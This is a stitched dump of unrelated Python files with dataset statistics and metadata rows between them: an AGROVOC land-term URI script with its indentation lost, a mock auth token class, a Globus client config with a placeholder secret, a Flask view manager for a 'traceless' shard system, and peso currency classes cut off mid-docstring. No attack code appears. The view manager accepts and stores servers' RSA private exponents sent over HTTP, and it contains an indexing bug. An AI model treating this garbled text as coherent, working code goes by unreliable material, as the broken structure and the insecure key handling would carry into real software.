# "expropriation" : "http://aims.fao.org/aos/agrovoc/c_1798",
# "land grabs" : "http://aims.fao.org/aos/agrovoc/c_45ce1b52",
# "land grabbing" : "http://aims.fao.org/aos/agrovoc/c_cc39a497",
# "land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
# "land information systems" : "http://aims.fao.org/aos/agrovoc/c_9000096",
# "land inheritance rights" : "http://aims.fao.org/aos/agrovoc/c_70a14ab3",
# "land investments" : "http://aims.fao.org/aos/agrovoc/c_9a4f48b4",
# "land law" : "http://aims.fao.org/aos/agrovoc/c_573abb9f",
# "land loans" : "http://aims.fao.org/aos/agrovoc/c_8b6d895f",
# "land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
# "land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
# "open access (land)" : "http://aims.fao.org/aos/agrovoc/c_51a39a94",
# "land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
# "property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
# "land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
# "land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
# "land rent" : "http://aims.fao.org/aos/agrovoc/c_7bea427c",
# "land speculation" : "http://aims.fao.org/aos/agrovoc/c_15d85712",
# "land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
# "land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
# "land tenants" : "http://aims.fao.org/aos/agrovoc/c_330886",
# "land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
# "land tenure systems" : "http://aims.fao.org/aos/agrovoc/c_66afb052",
# "land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
# "land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
# "land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
# "landlessness" : "http://aims.fao.org/aos/agrovoc/c_24403",
# "land ownership" : "http://aims.fao.org/aos/agrovoc/c_4184",
# "negotiated land reform" : "http://aims.fao.org/aos/agrovoc/c_f84a48c4",
# "pastoral land rights" : "http://aims.fao.org/aos/agrovoc/c_4d6b6100",
# "pastoral lands" : "http://aims.fao.org/aos/agrovoc/c_8e487587",
# "priest of the land" : "http://aims.fao.org/aos/agrovoc/c_28f78be5",
# "marital property rights" : "http://aims.fao.org/aos/agrovoc/c_64d8574a",
# "rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
# "regularization of illegal occupation" : "http://aims.fao.org/aos/agrovoc/c_3b50d6b6",
# "right of first occupancy" : "http://aims.fao.org/aos/agrovoc/c_9904d265",
# "scrublands" : "http://aims.fao.org/aos/agrovoc/c_6887",
# "security of tenure (land)" : "http://aims.fao.org/aos/agrovoc/c_7fc44e33",
# "sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
# "tenant farmers" : "http://aims.fao.org/aos/agrovoc/c_f73955fb",
# "title deed" : "http://aims.fao.org/aos/agrovoc/c_b769471e",
# "Torrens system" : "http://aims.fao.org/aos/agrovoc/c_7017dc39",
# "unclaimed lands" : "http://aims.fao.org/aos/agrovoc/c_0e0e555b",
# "water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
# "land governance" : "http://aims.fao.org/aos/agrovoc/c_aca7ac6d",
# "land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
# "urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
# }
#retrieve()
#retrieve_stats()
def filenames():
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
filename="\"results/all-results+"+agrovoc_label+".json\" , "
print filename
filenames() | 70.431877 | 1,796 | 0.641835 | 3,774 | 27,398 | 4.556439 | 0.119237 | 0.103978 | 0.189346 | 0.240986 | 0.826297 | 0.819958 | 0.819958 | 0.770528 | 0.732729 | 0.701733 | 0 | 0.080287 | 0.166253 | 27,398 | 389 | 1,797 | 70.431877 | 0.672504 | 0.313892 | 0 | 0.876866 | 0 | 0.022388 | 0.665472 | 0.058421 | 0 | 0 | 0 | 0.002571 | 0 | 0 | null | null | 0 | 0.011194 | null | null | 0.026119 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
1ce886065126a5f76f691c7355b2a4be4beb01e5 | 193 | py | Python | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | 1 | 2021-04-30T21:11:32.000Z | 2021-04-30T21:11:32.000Z | overpass/auth/auth_base.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
class AuthBase(ABC):
@abstractmethod
def get_token(self):
pass
class MockAuth(AuthBase):
def get_token(self):
return "TOKEN"
| 14.846154 | 35 | 0.663212 | 23 | 193 | 5.478261 | 0.565217 | 0.269841 | 0.174603 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.253886 | 193 | 12 | 36 | 16.083333 | 0.875 | 0 | 0 | 0.25 | 0 | 0 | 0.025907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.125 | 0.125 | 0.125 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
1cf2bc6146bc954e977e4cd642c9951bc9f1a76a | 203 | py | Python | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | 3 | 2020-08-26T19:43:45.000Z | 2022-02-11T20:35:52.000Z | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | 20 | 2020-06-11T21:19:54.000Z | 2022-02-03T19:11:20.000Z | examples/whattimeisitrightnow/app/config.py | globus/action-provider-tools | 9c84513bb0c6129ec97f7f03bd4052e6c021f14c | [
"Apache-2.0"
] | null | null | null | client_id = "16e16447-209a-4825-ae19-25e279d91642"
client_secret = "SECRET"
our_scope = "https://auth.globus.org/scopes/16e16447-209a-4825-ae19-25e279d91642/action_all_with_groups"
token_audience = None
| 40.6 | 104 | 0.812808 | 29 | 203 | 5.448276 | 0.758621 | 0.151899 | 0.202532 | 0.253165 | 0.405063 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272251 | 0.059113 | 203 | 4 | 105 | 50.75 | 0.554974 | 0 | 0 | 0 | 0 | 0.25 | 0.650246 | 0.17734 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1cf8f87700cfde067200d4a069549ab0416c3db6 | 8,161 | py | Python | demo/master/master_app/view_manager/routes.py | darksigma/traceless | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | 1 | 2015-06-19T14:27:52.000Z | 2015-06-19T14:27:52.000Z | master/master_app/view_manager/routes.py | pratheeknagaraj/securechat | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | null | null | null | master/master_app/view_manager/routes.py | pratheeknagaraj/securechat | eed3a35e90b8bbbf272e1f324e1c28de7afe08da | [
"MIT"
] | 1 | 2018-09-22T03:36:09.000Z | 2018-09-22T03:36:09.000Z | from . import view_manager
from flask import jsonify, request, abort
from flask import current_app as app
import os
from .. import traceless_crypto
import requests
import json
@view_manager.route('/', methods = ['POST'])
def hello_world():
print "hello world"
return "hello world"
@view_manager.route('/tick', methods=['POST'])
def tick():
with app.jinja_env.globals['server_view_manager_lock']:
app.jinja_env.globals['current_tick'] += 1
for shard in app.jinja_env.globals['server_views']:
if app.jinja_env.globals['current_tick'] - app.jinja_env.globals['primary_ticks'][shard] >= 5 \
and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard] \
and app.jinja_env.globals['server_views'][shard]['B'] != '':
app.jinja_env.globals['server_views'][shard]['P'] = app.jinja_env.globals['server_views'][shard]['B']
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['primary_acks'][shard] = app.jinja_env.globals['backup_acks'][shard]
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['backup_ticks'][shard]
if app.jinja_env.globals['server_views'][shard]['B'] != '' \
and app.jinja_env.globals['current_tick'] - app.jinja_env.globals['backup_ticks'][shard] >= 5 \
and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
return jsonify({'views' : app.jinja_env.globals['server_views']}), 200
@view_manager.route('/process_ping', methods=['POST'])
def process_ping():
with app.jinja_env.globals['server_view_manager_lock']:
app.jinja_env.globals['slave_keys'][request.json['slave_url']] = {'n' : request.json['rsa_n'], 'd' : request.json['rsa_d'], 'e' : request.json['rsa_e']}
if is_registered(request.json['slave_url']) is None:
no_primary = shards_without_primary()
no_backup = shards_without_backup()
if len(no_primary) != 0:
for shard in no_primary:
if app.jinja_env.globals['server_views'][shard]['N'] == 0:
app.jinja_env.globals['server_views'][shard]['N'] = request.json['view_num'] + 1
app.jinja_env.globals['server_views'][shard]['P'] = request.json['slave_url']
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['current_tick']
break
elif len(no_backup) != 0:
for shard in no_backup:
if app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['server_views'][shard]['B'] = request.json['slave_url']
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
break
else:
shard, view = is_registered(request.json['slave_url'])
if view['P'] == request.json['slave_url']:
if request.json['view_num'] == 0 and view['B'] != '':
app.jinja_env.globals['server_views'][shard]['P'] = app.jinja_env.globals['server_views'][shard]['B']
app.jinja_env.globals['server_views'][shard]['B'] = ''
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['primary_acks'][shard] = app.jinja_env.globals['backup_acks'][shard]
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['backup_ticks'][shard]
else:
app.jinja_env.globals['primary_acks'][shard] = request.json['view_num']
app.jinja_env.globals['primary_ticks'][shard] = app.jinja_env.globals['current_tick']
elif view['B'] == request.json['slave_url']:
if request.json['view_num'] == 0 and app.jinja_env.globals['server_views'][shard]['N'] == app.jinja_env.globals['primary_acks'][shard]:
app.jinja_env.globals['server_views'][shard]['N'] += 1
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
elif request.json['view_num'] != 0:
app.jinja_env.globals['backup_ticks'][shard] = app.jinja_env.globals['current_tick']
return jsonify({'views' : app.jinja_env.globals['server_views']}), 200
@view_manager.route('/update_server_view', methods=['POST'])
def update_server_view():
server_seen_nonces = app.jinja_env.globals['server_seen_nonces']
server_seen_nonces_lock = app.jinja_env.globals['server_seen_nonces_lock']
with server_seen_nonces_lock:
if not request.json or not traceless_crypto.verify(request.json['nonce'], request.json['signature']):
abort(400)
if request.json['nonce'] in server_seen_nonces:
return server_seen_nonces[request.json['nonce']]
shards = {}
with app.jinja_env.globals['server_view_manager_lock']:
for shard in app.jinja_env.globals['server_views']:
if app.jinja_env.globals['server_views'][shard]['P'] == '':
shard[shard] = None
else:
shards[shard] = {
'url' : app.jinja_env.globals['server_views'][shard]['P'],
'server_pk_n' : app.jinja_env.globals['slave_keys'][app.jinja_env.globals['server_views'][shard]['P']]['n'],
'server_pk_e' : app.jinja_env.globals['slave_keys'][app.jinja_env.globals['server_views'][shard]['P']]['e']
}
server_seen_nonces[request.json['nonce']] = jsonify({'shards' : shards,
'blinded_sign' : traceless_crypto.ust_sign(request.json['blinded_nonce'])}), 200
return server_seen_nonces[request.json['nonce']]
@view_manager.route('/connect_to_slave', methods=['POST'])
def connect_to_slave():
server_seen_nonces = app.jinja_env.globals['server_seen_nonces']
server_seen_nonces_lock = app.jinja_env.globals['server_seen_nonces_lock']
with server_seen_nonces_lock:
if not request.json or not traceless_crypto.verify(request.json['nonce'], request.json['signature']):
abort(400)
with app.jinja_env.globals['server_view_manager_lock']:
if request.json['nonce'] in server_seen_nonces:
return server_seen_nonces[request.json['nonce']]
slave_n = app.jinja_env.globals['slave_keys'][request.json['slave_url']]['n']
slave_d = app.jinja_env.globals['slave_keys'][request.json['slave_url']]['d']
server_seen_nonces[request.json['nonce']] = jsonify({'blinded_slave_sign' : traceless_crypto.master_ust_sign_for_slave(request.json['blinded_slave_nonce'], slave_n, slave_d),
'blinded_sign' : traceless_crypto.ust_sign(request.json['blinded_nonce'])}), 200
return server_seen_nonces[request.json['nonce']]
def is_registered(slave_url):
views = app.jinja_env.globals['server_views']
shard = [x for x in views if views[x]['P'] == slave_url or views[x]['B'] == slave_url]
if len(shard) == 0:
return None
else:
shard = shard[0]
return shard, views[shard]
def shards_without_primary():
views = app.jinja_env.globals['server_views']
return [x for x in views if views[x]['P'] == '']
def shards_without_backup():
views = app.jinja_env.globals['server_views']
return [x for x in views if views[x]['B'] == '']
| 57.879433 | 187 | 0.604828 | 1,029 | 8,161 | 4.527697 | 0.081633 | 0.127066 | 0.174716 | 0.285898 | 0.800172 | 0.788152 | 0.772483 | 0.736853 | 0.690062 | 0.654647 | 0 | 0.00566 | 0.24225 | 8,161 | 140 | 188 | 58.292857 | 0.747736 | 0 | 0 | 0.442623 | 0 | 0 | 0.175512 | 0.017404 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057377 | null | null | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c0a1063e1839031e99afef98b206f5e41277ed4 | 19,195 | py | Python | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/peso.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Peso currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class ArgentinePeso(Currency):
"""Argentine Peso currency representation.
Simple usage example:
>>> from multicurrency import ArgentinePeso
>>> argentine_peso = ArgentinePeso(
... amount=123456.789)
>>> print(argentine_peso)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'ArgentinePeso':
"""Class creator.
Returns:
ArgentinePeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ARS',
numeric_code='032',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AR$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class ChileanPeso(Currency):
"""Chilean Peso currency representation.
Simple usage example:
>>> from multicurrency import ChileanPeso
>>> chilean_peso = ChileanPeso(
... amount=123456.789)
>>> print(chilean_peso)
$123.457
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 0,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 0,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'ChileanPeso':
"""Class creator.
Returns:
ChileanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='CLP',
numeric_code='152',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CL$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class ColombianPeso(Currency):
"""Colombian Peso currency representation.
Simple usage example:
>>> from multicurrency import ColombianPeso
>>> colombian_peso = ColombianPeso(
... amount=123456.789)
>>> print(colombian_peso)
$ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'ColombianPeso':
"""Class creator.
Returns:
ColombianPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='COP',
numeric_code='170',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CO$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class CubanPeso(Currency):
"""Cuban Peso currency representation.
Simple usage example:
>>> from multicurrency import CubanPeso
>>> cuban_peso = CubanPeso(
... amount=123456.789)
>>> print(cuban_peso)
$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'CubanPeso':
"""Class creator.
Returns:
CubanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='CUP',
numeric_code='192',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CU$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class DominicanPeso(Currency):
"""Dominican Peso currency representation.
Simple usage example:
>>> from multicurrency import DominicanPeso
>>> dominican_peso = DominicanPeso(
... amount=123456.789)
>>> print(dominican_peso)
$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'DominicanPeso':
"""Class creator.
Returns:
DominicanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='DOP',
numeric_code='214',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='DO$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class MexicanPeso(Currency):
"""Mexican Peso currency representation.
Simple usage example:
>>> from multicurrency import MexicanPeso
>>> mexican_peso = MexicanPeso(
... amount=123456.789)
>>> print(mexican_peso)
$123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'MexicanPeso':
"""Class creator.
Returns:
MexicanPeso: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='MXN',
numeric_code='484',
symbol='$',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='MX$',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class PhilippinePeso(Currency):
"""Philippine Peso currency representation.
Simple usage example:
>>> from multicurrency import PhilippinePeso
>>> philippine_peso = PhilippinePeso(
... amount=123456.789)
>>> print(philippine_peso)
₱123,456.79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
